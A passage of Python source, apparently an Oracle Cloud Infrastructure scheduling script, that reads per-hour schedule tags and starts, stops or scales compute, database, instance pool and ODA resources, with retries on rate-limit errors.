query += " && compartmentId != '" + compartment_exclude + "'" if compartment_exclude else ""
sdetails = oci.resource_search.models.StructuredSearchDetails()
sdetails.query = query
NoError = True
try:
result = search.search_resources(search_details=sdetails, limit=1000, retry_strategy=oci.retry.DEFAULT_RETRY_STRATEGY).data
except oci.exceptions.ServiceError as response:
print ("Error: {} - {}".format(response.code, response.message))
result = oci.resource_search.models.ResourceSummaryCollection()
result.items = []
#################################################################
# Find additional resources not found by search (MySQL Service)
#################################################################
if not cmd.ignoremysql:
MakeOut("Finding MySQL instances in {} Compartments...".format(len(compartments)))
for c in compartments:
# check compartment include and exclude
if c.lifecycle_state != oci.identity.models.Compartment.LIFECYCLE_STATE_ACTIVE:
continue
if compartment_include:
if c.id != compartment_include:
continue
if compartment_exclude:
if c.id == compartment_exclude:
continue
mysql_instances = []
try:
mysql_instances = oci.pagination.list_call_get_all_results(
mysql.list_db_systems,
compartment_id=c.id,
retry_strategy=oci.retry.DEFAULT_RETRY_STRATEGY
).data
except Exception:
MakeOut("e", True)
mysql_instances = []
continue
for mysql_instance in mysql_instances:
if PredefinedTag not in mysql_instance.defined_tags or mysql_instance.lifecycle_state != "ACTIVE":
continue
summary = oci.resource_search.models.ResourceSummary()
summary.availability_domain = mysql_instance.availability_domain
summary.compartment_id = mysql_instance.compartment_id
summary.defined_tags = mysql_instance.defined_tags
summary.freeform_tags = mysql_instance.freeform_tags
summary.identifier = mysql_instance.id
summary.lifecycle_state = mysql_instance.lifecycle_state
summary.display_name = mysql_instance.display_name
summary.resource_type = "MysqlDBInstance"
result.items.append(summary)
MakeOut("")
#################################################################
# All the items with a schedule are now collected.
# Let's go thru them and find / validate the correct schedule
#################################################################
total_resources += len(result.items)
MakeOut("")
MakeOut("Checking {} Resources for Auto Scale...".format(len(result.items)))
for resource in result.items:
# The search data is not always updated. Get the tags from the actual resource itself, not using the search data.
resourceOk = False
if cmd.print_ocid:
MakeOut("Checking {} ({}) - {}...".format(resource.display_name, resource.resource_type, resource.identifier))
else:
MakeOut("Checking {} ({})...".format(resource.display_name, resource.resource_type))
if resource.resource_type == "Instance":
resourceDetails = compute.get_instance(instance_id=resource.identifier, retry_strategy=oci.retry.DEFAULT_RETRY_STRATEGY).data
resourceOk = True
if resource.resource_type == "DbSystem":
resourceDetails = database.get_db_system(db_system_id=resource.identifier, retry_strategy=oci.retry.DEFAULT_RETRY_STRATEGY).data
resourceOk = True
if resource.resource_type == "VmCluster":
resourceDetails = database.get_vm_cluster(vm_cluster_id=resource.identifier, retry_strategy=oci.retry.DEFAULT_RETRY_STRATEGY).data
resourceOk = True
if resource.resource_type == "AutonomousDatabase":
resourceDetails = database.get_autonomous_database(autonomous_database_id=resource.identifier, retry_strategy=oci.retry.DEFAULT_RETRY_STRATEGY).data
resourceOk = True
if resource.resource_type == "InstancePool":
resourceDetails = pool.get_instance_pool(instance_pool_id=resource.identifier, retry_strategy=oci.retry.DEFAULT_RETRY_STRATEGY).data
resourceOk = True
if resource.resource_type == "OdaInstance":
resourceDetails = oda.get_oda_instance(oda_instance_id=resource.identifier, retry_strategy=oci.retry.DEFAULT_RETRY_STRATEGY).data
resourceOk = True
if resource.resource_type == "AnalyticsInstance":
resourceDetails = analytics.get_analytics_instance(analytics_instance_id=resource.identifier, retry_strategy=oci.retry.DEFAULT_RETRY_STRATEGY).data
resourceOk = True
if resource.resource_type == "IntegrationInstance":
resourceDetails = integration.get_integration_instance(integration_instance_id=resource.identifier, retry_strategy=oci.retry.DEFAULT_RETRY_STRATEGY).data
resourceOk = True
if resource.resource_type == "LoadBalancer":
resourceDetails = loadbalancer.get_load_balancer(load_balancer_id=resource.identifier, retry_strategy=oci.retry.DEFAULT_RETRY_STRATEGY).data
resourceOk = True
if resource.resource_type == "MysqlDBInstance":
resourceDetails = mysql.get_db_system(db_system_id=resource.identifier, retry_strategy=oci.retry.DEFAULT_RETRY_STRATEGY).data
resourceOk = True
if resource.resource_type == "GoldenGateDeployment":
resourceDetails = goldengate.get_deployment(deployment_id=resource.identifier, retry_strategy=oci.retry.DEFAULT_RETRY_STRATEGY).data
resourceOk = True
if resource.resource_type == "DISWorkspace":
resourceDetails = dataintegration.get_workspace(workspace_id=resource.identifier, retry_strategy=oci.retry.DEFAULT_RETRY_STRATEGY).data
resourceOk = True
if not isDeleted(resource.lifecycle_state) and resourceOk:
schedule = resourceDetails.defined_tags[PredefinedTag]
ActiveSchedule = ""
if AnyDay in schedule:
ActiveSchedule = schedule[AnyDay]
if isWeekDay(DayOfWeek): # check for weekday / weekend
if WeekDay in schedule:
ActiveSchedule = schedule[WeekDay]
else:
if Weekend in schedule:
ActiveSchedule = schedule[Weekend]
if Day in schedule: # Check for day specific tag (today)
ActiveSchedule = schedule[Day]
#################################################################
# Check if the active schedule contains exactly 24 numbers for each hour of the day
#################################################################
if ActiveSchedule != "":
try:
schedulehours = ActiveSchedule.split(",")
if len(schedulehours) != 24:
ErrorsFound = True
errors.append(" - Error with schedule of {} - {}, not correct amount of hours, I count {}".format(resource.display_name, ActiveSchedule, len(schedulehours)))
MakeOut(" - Error with schedule of {} - {}, not correct amount of hours, i count {}".format(resource.display_name, ActiveSchedule, len(schedulehours)))
ActiveSchedule = ""
except Exception:
ErrorsFound = True
ActiveSchedule = ""
errors.append(" - Error with schedule for {}".format(resource.display_name))
MakeOut(" - Error with schedule of {}".format(resource.display_name))
MakeOut(sys.exc_info()[0])
else:
MakeOut(" - Ignoring instance, as no active schedule for today found")
###################################################################################
# if schedule validated, let see if we can apply the new schedule to the resource
###################################################################################
if ActiveSchedule != "":
DisplaySchedule = ""
c = 0
for h in schedulehours:
if c == CurrentHour:
DisplaySchedule = DisplaySchedule + "[" + h + "],"
else:
DisplaySchedule = DisplaySchedule + h + ","
c = c + 1
MakeOut(" - Active schedule for {}: {}".format(resource.display_name, DisplaySchedule))
if schedulehours[CurrentHour] == "*":
MakeOut(" - Ignoring this service for this hour")
else:
###################################################################################
# Instance
###################################################################################
if resource.resource_type == "Instance":
# Only perform action if VM Instance, ignoring any BM instances.
if resourceDetails.shape[:2] == "VM":
######## WAIT UNTIL THE INSTANCE HAS A VALID STATE (RUNNING OR STOPPED) ########
while (compute.get_instance(resource.identifier).data.lifecycle_state.upper() != "RUNNING" and compute.get_instance(resource.identifier).data.lifecycle_state.upper() != "STOPPED") :
time.sleep(5)
######## SHUTDOWN ########
if resourceDetails.lifecycle_state == "RUNNING" and int(schedulehours[CurrentHour]) == 0:
MakeOut(" - Initiate Compute VM shutdown for {}".format(resource.display_name))
MakeLog("[STOP] Instance {}".format(resource.display_name))
Retry = True
while Retry:
try:
response = compute.instance_action(instance_id=resource.identifier, action=ComputeShutdownMethod)
Retry = False
success.append(" - Initiate Compute VM shutdown for {}".format(resource.display_name))
except oci.exceptions.ServiceError as response:
if response.status == 429:
MakeOut("Rate limit kicking in.. waiting {} seconds...".format(RateLimitDelay))
time.sleep(RateLimitDelay)
else:
ErrorsFound = True
errors.append(" - Error ({}) Compute VM Shutdown for {} - {}".format(response.status, resource.display_name, response.message))
MakeOut(" - Error ({}) Compute VM Shutdown for {} - {}".format(response.status, resource.display_name, response.message))
Retry = False
######## SCALE UP/DOWN ########
if resourceDetails.lifecycle_state == "RUNNING" and int(schedulehours[CurrentHour]) != 0:
if int(resourceDetails.shape_config.ocpus) != int(schedulehours[CurrentHour]) :
MakeOut(" - Initiate Compute VM scale for {}".format(resource.display_name))
MakeLog("[SCALE] Instance {}".format(resource.display_name))
Retry = True
while Retry:
try:
response = compute.update_instance(instance_id=resource.identifier, update_instance_details=oci.core.models.UpdateInstanceDetails(shape_config=oci.core.models.UpdateInstanceShapeConfigDetails(ocpus=int(schedulehours[CurrentHour]),memory_in_gbs=int(resourceDetails.shape_config.memory_in_gbs))))
Retry = False
success.append(" - Initiate Compute VM scale for {}".format(resource.display_name))
except oci.exceptions.ServiceError as response:
if response.status == 429:
MakeOut("Rate limit kicking in.. waiting {} seconds...".format(RateLimitDelay))
time.sleep(RateLimitDelay)
else:
ErrorsFound = True
errors.append(" - Error ({}) Compute VM scale for {} - {}".format(response.status, resource.display_name, response.message))
MakeOut(" - Error ({}) Compute VM scale for {} - {}".format(response.status, resource.display_name, response.message))
Retry = False
if resourceDetails.lifecycle_state == "STOPPED" and int(schedulehours[CurrentHour]) > 0:
######## START AND SCALE UP/DOWN ########
if int(resourceDetails.shape_config.ocpus) != int(schedulehours[CurrentHour]) :
MakeOut(" - Initiate Compute VM startup and scale for {}".format(resource.display_name))
MakeLog("[START | SCALE] Instance {}".format(resource.display_name))
Retry = True
while Retry:
try:
response = compute.instance_action(instance_id=resource.identifier, action="START")
while compute.get_instance(resource.identifier).data.lifecycle_state != "RUNNING" :
time.sleep(5)
response = compute.update_instance(instance_id=resource.identifier, update_instance_details=oci.core.models.UpdateInstanceDetails(shape_config=oci.core.models.UpdateInstanceShapeConfigDetails(ocpus=int(schedulehours[CurrentHour]),memory_in_gbs=int(resourceDetails.shape_config.memory_in_gbs))))
Retry = False
success.append(" - Initiate Compute VM startup and scale for {}".format(resource.display_name))
except oci.exceptions.ServiceError as response:
if response.status == 429:
MakeOut("Rate limit kicking in.. waiting {} seconds...".format(RateLimitDelay))
time.sleep(RateLimitDelay)
else:
ErrorsFound = True
errors.append(" - Error ({}) Compute VM startup and scale for {} - {}".format(response.status, resource.display_name, response.message))
Retry = False
######## START ########
if int(resourceDetails.shape_config.ocpus) == int(schedulehours[CurrentHour]) :
MakeOut(" - Initiate Compute VM startup for {}".format(resource.display_name))
MakeLog("[START] Instance {}".format(resource.display_name))
Retry = True
while Retry:
try:
response = compute.instance_action(instance_id=resource.identifier, action="START")
Retry = False
success.append(" - Initiate Compute VM startup for {}".format(resource.display_name))
except oci.exceptions.ServiceError as response:
if response.status == 429:
MakeOut("Rate limit kicking in.. waiting {} seconds...".format(RateLimitDelay))
time.sleep(RateLimitDelay)
else:
ErrorsFound = True
errors.append(" - Error ({}) Compute VM startup for {} - {}".format(response.status, resource.display_name, response.message))
Retry = False
###################################################################################
# DBSystem
###################################################################################
if resource.resource_type == "DbSystem":
# Execute On/Off operations for Database VMs
if resourceDetails.shape[:2] == "VM":
dbnodes = database.list_db_nodes(compartment_id=resource.compartment_id, db_system_id=resource.identifier).data
for dbnodedetails in dbnodes:
if int(schedulehours[CurrentHour]) == 0 or int(schedulehours[CurrentHour]) == 1:
if dbnodedetails.lifecycle_state == "AVAILABLE" and int(schedulehours[CurrentHour]) == 0:
MakeOut(" - Initiate DB VM shutdown for {}".format(resource.display_name))
MakeLog("[STOP] DB VM {}".format(resource.display_name))
Retry = True
while Retry:
try:
response = database.db_node_action(db_node_id=dbnodedetails.id, action="STOP")
Retry = False
success.append(" - Initiate DB VM shutdown for {}".format(resource.display_name))
except oci.exceptions.ServiceError as response:
if response.status == 429:
MakeOut("Rate limit kicking in.. waiting {} seconds...".format(RateLimitDelay))
time.sleep(RateLimitDelay)
else:
ErrorsFound = True
errors.append(" - Error ({}) DB VM shutdown for {} - {}".format(response.status, resource.display_name, response.message))
Retry = False
if dbnodedetails.lifecycle_state == "STOPPED" and int(schedulehours[CurrentHour]) == 1:
MakeOut(" - Initiate DB VM startup for {}".format(resource.display_name))
MakeLog("[START] DB VM {}".format(resource.display_name))
Retry = True
while Retry:
try:
response = database.db_node_action(db_node_id=dbnodedetails.id, action="START")
Retry = False
success.append(" - Initiate DB VM startup for {}".format(resource.display_name))
except oci.exceptions.ServiceError as response:
if response.status == 429:
MakeOut("Rate limit kicking in.. waiting {} seconds...".format(RateLimitDelay))
time.sleep(RateLimitDelay)
else:
ErrorsFound = True
errors.append(" - Error ({}) DB VM startup for {} - {}".format(response.status, resource.display_name, response.message))
Retry = False
###################################################################################
# BM
###################################################################################
if resourceDetails.shape[:2] == "BM":
if int(schedulehours[CurrentHour]) > 1 and int(schedulehours[CurrentHour]) < 53:
if resourceDetails.cpu_core_count > int(schedulehours[CurrentHour]):
if Action == "All" or Action == "Down":
MakeOut(" - Initiate DB BM Scale Down to {} for {}".format(int(schedulehours[CurrentHour]), resource.display_name))
dbupdate = oci.database.models.UpdateDbSystemDetails()
dbupdate.cpu_core_count = int(schedulehours[CurrentHour])
Retry = True
while Retry:
try:
response = database.update_db_system(db_system_id=resource.identifier, update_db_system_details=dbupdate)
Retry = False
success.append(
" - Initiate DB BM Scale Down from {}to {} for {}".format(resourceDetails.cpu_core_count, (schedulehours[CurrentHour]),
resource.display_name))
except oci.exceptions.ServiceError as response:
if response.status == 429:
MakeOut("Rate limit kicking in.. waiting {} seconds...".format(RateLimitDelay))
time.sleep(RateLimitDelay)
else:
ErrorsFound = True
errors.append(" - Error ({}) DB BM Scale Down from {} to {} for {} - {}".format(response.status, resourceDetails.cpu_core_count,
int(schedulehours[CurrentHour]),
resource.display_name, response.message))
MakeOut(" - Error ({}) DB BM Scale Down from {} to {} for {} - {}".format(response.status, resourceDetails.cpu_core_count,
int(schedulehours[CurrentHour]),
resource.display_name, response.message))
Retry = False
if resourceDetails.cpu_core_count < int(schedulehours[CurrentHour]):
if Action == "All" or Action == "Up":
MakeOut(" - Initiate DB BM Scale UP to {} for {}".format(int(schedulehours[CurrentHour]), resource.display_name))
dbupdate = oci.database.models.UpdateDbSystemDetails()
dbupdate.cpu_core_count = int(schedulehours[CurrentHour])
Retry = True
while Retry:
try:
response = database.update_db_system(db_system_id=resource.identifier, update_db_system_details=dbupdate)
Retry = False
success.append(
" - Initiate DB BM Scale UP from {} to {} for {}".format(resourceDetails.cpu_core_count, int(schedulehours[CurrentHour]),
resource.display_name))
except oci.exceptions.ServiceError as response:
if response.status == 429:
MakeOut("Rate limit kicking in.. waiting {} seconds...".format(RateLimitDelay))
time.sleep(RateLimitDelay)
else:
ErrorsFound = True
errors.append(" - Error ({}) DB BM Scale UP from {} to {} for {} - {}".format(response.status, resourceDetails.cpu_core_count, int(schedulehours[CurrentHour]), resource.display_name, response.message))
MakeOut(" - Error ({}) DB BM Scale UP from {} to {} for {} - {}".format(response.status, resourceDetails.cpu_core_count, int(schedulehours[CurrentHour]), resource.display_name, response.message))
Retry = False
###################################################################################
# Exadata
###################################################################################
if resourceDetails.shape[:7] == "Exadata":
if resourceDetails.cpu_core_count > int(schedulehours[CurrentHour]):
if Action == "All" or Action == "Down":
MakeOut(" - Initiate Exadata CS Scale Down from {} to {} for {}".format(resourceDetails.cpu_core_count, int(schedulehours[CurrentHour]),
resource.display_name))
dbupdate = oci.database.models.UpdateDbSystemDetails()
dbupdate.cpu_core_count = int(schedulehours[CurrentHour])
Retry = True
while Retry:
try:
response = database.update_db_system(db_system_id=resource.identifier, update_db_system_details=dbupdate)
Retry = False
success.append(" - Initiate Exadata DB Scale Down to {} at {} for {}".format(resourceDetails.cpu_core_count, int(schedulehours[CurrentHour]), resource.display_name))
except oci.exceptions.ServiceError as response:
if response.status == 429:
MakeOut("Rate limit kicking in.. waiting {} seconds...".format(RateLimitDelay))
time.sleep(RateLimitDelay)
else:
ErrorsFound = True
errors.append(" - Error ({}) Exadata DB Scale Down from {} to {} for {} - {}".format(response.status, resourceDetails.cpu_core_count, int(schedulehours[CurrentHour]), resource.display_name, response.message))
MakeOut(" - Error ({}) Exadata DB Scale Down from {} to {} for {} - {}".format(response.status, resourceDetails.cpu_core_count, int(schedulehours[CurrentHour]), resource.display_name, response.message))
Retry = False
if resourceDetails.cpu_core_count < int(schedulehours[CurrentHour]):
if Action == "All" or Action == "Up":
MakeOut(" - Initiate Exadata CS Scale UP from {} to {} for {}".format(resourceDetails.cpu_core_count, int(schedulehours[CurrentHour]), resource.display_name))
dbupdate = oci.database.models.UpdateDbSystemDetails()
dbupdate.cpu_core_count = int(schedulehours[CurrentHour])
Retry = True
while Retry:
try:
response = database.update_db_system(db_system_id=resource.identifier, update_db_system_details=dbupdate)
Retry = False
success.append(" - Initiate Exadata DB BM Scale UP from {} to {} for {}".format(resourceDetails.cpu_core_count, int(schedulehours[CurrentHour]), resource.display_name))
except oci.exceptions.ServiceError as response:
if response.status == 429:
MakeOut("Rate limit kicking in.. waiting {} seconds...".format(RateLimitDelay))
time.sleep(RateLimitDelay)
else:
ErrorsFound = True
errors.append(" - Error ({}) Exadata DB Scale Up from {} to {} for {} - {}".format(response.status, resourceDetails.cpu_core_count, int(schedulehours[CurrentHour]), resource.display_name, response.message))
MakeOut(" - Error ({}) Exadata DB Scale Up from {} to {} for {} - {}".format(response.status, resourceDetails.cpu_core_count, int(schedulehours[CurrentHour]), resource.display_name, response.message))
Retry = False
###################################################################################
# VmCluster
###################################################################################
if resource.resource_type == "VmCluster":
if int(schedulehours[CurrentHour]) >= 0 and int(schedulehours[CurrentHour]) < 401:
# Cluster VM is running, request is amount of CPU core change is needed
if resourceDetails.lifecycle_state == "AVAILABLE" and int(schedulehours[CurrentHour]) > 0:
if resourceDetails.cpus_enabled > int(schedulehours[CurrentHour]):
if Action == "All" or Action == "Down":
MakeOut(" - Initiate ExadataC@C VM Cluster Scale Down to {} for {}".format(int(schedulehours[CurrentHour]), resource.display_name))
dbupdate = oci.database.models.UpdateVmClusterDetails()
dbupdate.cpu_core_count = int(schedulehours[CurrentHour])
Retry = True
while Retry:
try:
response = database.update_vm_cluster(vm_cluster_id=resource.identifier, update_vm_cluster_details=dbupdate)
Retry = False
success.append(" - Initiate ExadataC&C Cluster VM Scale Down from {} to {} for {}".format(resourceDetails.cpus_enabled, int(schedulehours[CurrentHour]), resource.display_name))
except oci.exceptions.ServiceError as response:
if response.status == 429:
MakeOut("Rate limit kicking in.. waiting {} seconds...".format(RateLimitDelay))
time.sleep(RateLimitDelay)
else:
ErrorsFound = True
errors.append(" - Error ({}) ExadataC&C Cluster VM Scale Down from {} to {} for {} - {}".format(response.status, resourceDetails.cpus_enabled, int(schedulehours[CurrentHour]), resource.display_name, response.message))
MakeOut(" - Error ({}) ExadataC&C Cluster VM Scale Down from {} to {} for {} - {}".format(response.status, resourceDetails.cpus_enabled, int(schedulehours[CurrentHour]), resource.display_name, response.message))
Retry = False
if resourceDetails.cpus_enabled < int(schedulehours[CurrentHour]):
if Action == "All" or Action == "Up":
MakeOut(
" - Initiate ExadataC@C VM Cluster Scale Up from {} to {} for {}".format(resourceDetails.cpus_enabled, int(schedulehours[CurrentHour]), resource.display_name))
dbupdate = oci.database.models.UpdateVmClusterDetails()
dbupdate.cpu_core_count = int(schedulehours[CurrentHour])
Retry = True
while Retry:
try:
response = database.update_vm_cluster(vm_cluster_id=resource.identifier, update_vm_cluster_details=dbupdate)
Retry = False
success.append(" - Initiate ExadataC&C Cluster VM Scale Up to {} for {}".format(int(schedulehours[CurrentHour]), resource.display_name))
except oci.exceptions.ServiceError as response:
if response.status == 429:
MakeOut("Rate limit kicking in.. waiting {} seconds...".format(RateLimitDelay))
time.sleep(RateLimitDelay)
else:
ErrorsFound = True
errors.append(" - Error ({}) ExadataC&C Cluster VM Scale Up from {} to {} for {} - {}".format(response.status, resourceDetails.cpus_enabled, int(schedulehours[CurrentHour]), resource.display_name, response.message))
MakeOut(" - Error ({}) ExadataC&C Cluster VM Scale Up from {} to {} for {} - {}".format(response.status, resourceDetails.cpus_enabled, int(schedulehours[CurrentHour]), resource.display_name, response.message))
Retry = False
###################################################################################
# AutonomousDatabase
###################################################################################
# Execute CPU Scale Up/Down operations for Database BMs
if resource.resource_type == "AutonomousDatabase":
if int(schedulehours[CurrentHour]) >= 0 and int(schedulehours[CurrentHour]) < 129:
# Autonomous DB is running request is amount of CPU core change is needed
if resourceDetails.lifecycle_state == "AVAILABLE" and int(schedulehours[CurrentHour]) > 0:
if resourceDetails.cpu_core_count > int(schedulehours[CurrentHour]):
if Action == "All" or Action == "Down":
MakeOut(" - Initiate Autonomous DB Scale Down to {} for {}".format(int(schedulehours[CurrentHour]),
resource.display_name))
dbupdate = oci.database.models.UpdateAutonomousDatabaseDetails()
dbupdate.cpu_core_count = int(schedulehours[CurrentHour])
Retry = True
while Retry:
try:
response = database.update_autonomous_database(autonomous_database_id=resource.identifier, update_autonomous_database_details=dbupdate)
Retry = False
success.append(" - Initiate Autonomous DB Scale Down from {} to {} for {}".format(resourceDetails.cpu_core_count, int(schedulehours[CurrentHour]), resource.display_name))
except oci.exceptions.ServiceError as response:
if response.status == 429:
MakeOut("Rate limit kicking in.. waiting {} seconds...".format(RateLimitDelay))
time.sleep(RateLimitDelay)
else:
ErrorsFound = True
errors.append(" - Error ({}) Autonomous DB Scale Down from {} to {} for {} - {}".format(response.status, resourceDetails.cpu_core_count, int(schedulehours[CurrentHour]), resource.display_name, response.message))
MakeOut(" - Error ({}) Autonomous DB Scale Down from {} to {} for {} - {}".format(response.status, resourceDetails.cpu_core_count, int(schedulehours[CurrentHour]), resource.display_name, response.message))
Retry = False
if resourceDetails.cpu_core_count < int(schedulehours[CurrentHour]):
if Action == "All" or Action == "Up":
MakeOut(" - Initiate Autonomous DB Scale Up from {} to {} for {}".format(resourceDetails.cpu_core_count, int(schedulehours[CurrentHour]), resource.display_name))
dbupdate = oci.database.models.UpdateAutonomousDatabaseDetails()
dbupdate.cpu_core_count = int(schedulehours[CurrentHour])
Retry = True
while Retry:
try:
response = database.update_autonomous_database(autonomous_database_id=resource.identifier, update_autonomous_database_details=dbupdate)
Retry = False
success.append(" - Initiate Autonomous DB Scale Up to {} for {}".format(int(schedulehours[CurrentHour]), resource.display_name))
except oci.exceptions.ServiceError as response:
if response.status == 429:
MakeOut("Rate limit kicking in.. waiting {} seconds...".format(RateLimitDelay))
time.sleep(RateLimitDelay)
else:
ErrorsFound = True
errors.append(" - Error ({}) Autonomous DB Scale Up from {} to {} for {} - {}".format(response.status, resourceDetails.cpu_core_count, int(schedulehours[CurrentHour]), resource.display_name, response.message))
MakeOut(" - Error ({}) Autonomous DB Scale Up from {} to {} for {} - {}".format(response.status, resourceDetails.cpu_core_count, int(schedulehours[CurrentHour]), resource.display_name, response.message))
Retry = False
# Autonomous DB is running request is to stop the database
if resourceDetails.lifecycle_state == "AVAILABLE" and int(schedulehours[CurrentHour]) == 0:
if Action == "All" or Action == "Down":
MakeOut(" - Stoping Autonomous DB {}".format(resource.display_name))
Retry = True
while Retry:
try:
response = database.stop_autonomous_database(autonomous_database_id=resource.identifier)
Retry = False
success.append(" - Initiate Autonomous DB Shutdown for {}".format(resource.display_name))
except oci.exceptions.ServiceError as response:
if response.status == 429:
MakeOut("Rate limit kicking in.. waiting {} seconds...".format(RateLimitDelay))
time.sleep(RateLimitDelay)
else:
ErrorsFound = True
errors.append(" - Error ({}) Autonomous DB Shutdown for {} - {}".format(response.status, resource.display_name, response.message))
MakeOut(" - Error ({}) Autonomous DB Shutdown for {} - {}".format(response.status, resource.display_name, response.message))
Retry = False
if resourceDetails.lifecycle_state == "STOPPED" and int(schedulehours[CurrentHour]) > 0:
if Action == "All" or Action == "Up":
# Autonomous DB is stopped and needs to be started with same amount of CPUs configured
if resourceDetails.cpu_core_count == int(schedulehours[CurrentHour]):
MakeOut(" - Starting Autonomous DB {}".format(resource.display_name))
Retry = True
while Retry:
try:
response = database.start_autonomous_database(autonomous_database_id=resource.identifier)
Retry = False
success.append(" - Initiate Autonomous DB Startup for {}".format(resource.display_name))
except oci.exceptions.ServiceError as response:
if response.status == 429:
MakeOut("Rate limit kicking in.. waiting {} seconds...".format(RateLimitDelay))
time.sleep(RateLimitDelay)
else:
ErrorsFound = True
errors.append(" - Error ({}) Autonomous DB Startup for {} - {}".format(response.status, resource.display_name, response.message))
MakeOut(" - Error ({}) Autonomous DB Startup for {} - {}".format(response.status, resource.display_name, response.message))
Retry = False
# Autonomous DB is stopped and needs to be started, after that it requires CPU change
if resourceDetails.cpu_core_count != int(schedulehours[CurrentHour]):
tcount = tcount + 1
thread = AutonomousThread(tcount, resource.identifier, resource.display_name, int(schedulehours[CurrentHour]))
thread.start()
threads.append(thread)
###################################################################################
# InstancePool
###################################################################################
                    if resource.resource_type == "InstancePool":
                        # Stop Resource pool action
                        # Schedule value 0 => pool should be fully stopped this hour.
                        if resourceDetails.lifecycle_state == "RUNNING" and int(schedulehours[CurrentHour]) == 0:
                            if Action == "All" or Action == "Down":
                                # NOTE(review): success message is appended both here and again inside the
                                # try block on API success, so it can appear twice — verify intent.
                                success.append(" - Stopping instance pool {}".format(resource.display_name))
                                MakeOut(" - Stopping instance pool {}".format(resource.display_name))
                                Retry = True
                                # Retry loop: only HTTP 429 (rate limit) is retried; any other
                                # ServiceError is recorded and the loop exits.
                                while Retry:
                                    try:
                                        response = pool.stop_instance_pool(instance_pool_id=resource.identifier)
                                        Retry = False
                                        success.append(" - Stopping instance pool {}".format(resource.display_name))
                                    except oci.exceptions.ServiceError as response:
                                        if response.status == 429:
                                            MakeOut("Rate limit kicking in.. waiting {} seconds...".format(RateLimitDelay))
                                            time.sleep(RateLimitDelay)
                                        else:
                                            ErrorsFound = True
                                            errors.append(" - Error ({}) Stopping instance pool for {} - {}".format(response.status, resource.display_name, response.message))
                                            MakeOut(" - Error ({}) Stopping instance pool for {} - {}".format(response.status, resource.display_name, response.message))
                                            Retry = False
                        # Scale up action on running instance pool
                        # (schedule value is interpreted as the desired pool size).
                        elif resourceDetails.lifecycle_state == "RUNNING" and int(schedulehours[CurrentHour]) > resourceDetails.size:
                            if Action == "All" or Action == "Up":
                                MakeOut(" - Scaling up instance pool {} to {} instances".format(resource.display_name, int(schedulehours[CurrentHour])))
                                pooldetails = oci.core.models.UpdateInstancePoolDetails()
                                pooldetails.size = int(schedulehours[CurrentHour])
                                Retry = True
                                while Retry:
                                    try:
                                        response = pool.update_instance_pool(instance_pool_id=resource.identifier, update_instance_pool_details=pooldetails)
                                        Retry = False
                                        success.append(" - Scaling up instance pool {} to {} instances".format(resource.display_name, int(schedulehours[CurrentHour])))
                                    except oci.exceptions.ServiceError as response:
                                        if response.status == 429:
                                            MakeOut("Rate limit kicking in.. waiting {} seconds...".format(RateLimitDelay))
                                            time.sleep(RateLimitDelay)
                                        else:
                                            ErrorsFound = True
                                            errors.append(" - Error ({}) Scaling up instance pool {} to {} instances - {}".format(response.status, resource.display_name, int(schedulehours[CurrentHour]), response.message))
                                            Retry = False
                        # Scale down action on running instance pool
                        elif resourceDetails.lifecycle_state == "RUNNING" and int(schedulehours[CurrentHour]) < resourceDetails.size:
                            if Action == "All" or Action == "Down":
                                MakeOut(" - Scaling down instance pool {} to {} instances".format(resource.display_name, int(schedulehours[CurrentHour])))
                                pooldetails = oci.core.models.UpdateInstancePoolDetails()
                                pooldetails.size = int(schedulehours[CurrentHour])
                                Retry = True
                                while Retry:
                                    try:
                                        response = pool.update_instance_pool(instance_pool_id=resource.identifier, update_instance_pool_details=pooldetails)
                                        Retry = False
                                        success.append(" - Scaling down instance pool {} to {} instances".format(resource.display_name, int(schedulehours[CurrentHour])))
                                    except oci.exceptions.ServiceError as response:
                                        if response.status == 429:
                                            MakeOut("Rate limit kicking in.. waiting {} seconds...".format(RateLimitDelay))
                                            time.sleep(RateLimitDelay)
                                        else:
                                            ErrorsFound = True
                                            errors.append(" - Error ({}) Scaling down instance pool {} to {} instances - {}".format(response.status, resource.display_name, int(schedulehours[CurrentHour]), response.message))
                                            Retry = False
                        elif resourceDetails.lifecycle_state == "STOPPED" and int(schedulehours[CurrentHour]) > 0:
                            if Action == "All" or Action == "Up":
                                # Start instance pool with same amount of instances as configured
                                if resourceDetails.size == int(schedulehours[CurrentHour]):
                                    success.append(" - Starting instance pool {} from stopped state".format(resource.display_name))
                                    MakeOut(" - Starting instance pool {} from stopped state".format(resource.display_name))
                                    Retry = True
                                    while Retry:
                                        try:
                                            response = pool.start_instance_pool(instance_pool_id=resource.identifier)
                                            Retry = False
                                            success.append(" - Starting instance pool {} from stopped state".format(resource.display_name))
                                        except oci.exceptions.ServiceError as response:
                                            if response.status == 429:
                                                MakeOut("Rate limit kicking in.. waiting {} seconds...".format(RateLimitDelay))
                                                time.sleep(RateLimitDelay)
                                            else:
                                                ErrorsFound = True
                                                errors.append(" - Error ({}) Starting instance pool {} from stopped state - {}".format(response.status, resource.display_name, response.message))
                                                Retry = False
                                # Start instance pool and after that resize the instance pool to desired state:
                                # handled on a worker thread (PoolThread) so the main loop is not blocked
                                # while the pool comes up before it can be resized.
                                if resourceDetails.size != int(schedulehours[CurrentHour]):
                                    tcount = tcount + 1
                                    thread = PoolThread(tcount, resource.identifier, resource.display_name, int(schedulehours[CurrentHour]))
                                    thread.start()
                                    threads.append(thread)
###################################################################################
# OdaInstance
###################################################################################
                    if resource.resource_type == "OdaInstance":
                        # ODA instances only support full stop (0) / start (1) schedule values.
                        if int(schedulehours[CurrentHour]) == 0 or int(schedulehours[CurrentHour]) == 1:
                            if resourceDetails.lifecycle_state == "ACTIVE" and int(schedulehours[CurrentHour]) == 0:
                                if Action == "All" or Action == "Down":
                                    MakeOut(" - Initiate ODA shutdown for {}".format(resource.display_name))
                                    Retry = True
                                    # Retry only on HTTP 429 (rate limit); other errors are recorded.
                                    while Retry:
                                        try:
                                            response = oda.stop_oda_instance(oda_instance_id=resource.identifier)
                                            Retry = False
                                            success.append(" - Initiate ODA shutdown for {}".format(resource.display_name))
                                        except oci.exceptions.ServiceError as response:
                                            if response.status == 429:
                                                MakeOut("Rate limit kicking in.. waiting {} seconds...".format(RateLimitDelay))
                                                time.sleep(RateLimitDelay)
                                            else:
                                                ErrorsFound = True
                                                errors.append(" - Error ({}) ODA Shutdown for {} - {}".format(response.status, resource.display_name, response.message))
                                                MakeOut(" - Error ({}) ODA Shutdown for {} - {}".format(response.status, resource.display_name, response.message))
                                                Retry = False
                            if resourceDetails.lifecycle_state == "INACTIVE" and int(schedulehours[CurrentHour]) == 1:
                                if Action == "All" or Action == "Up":
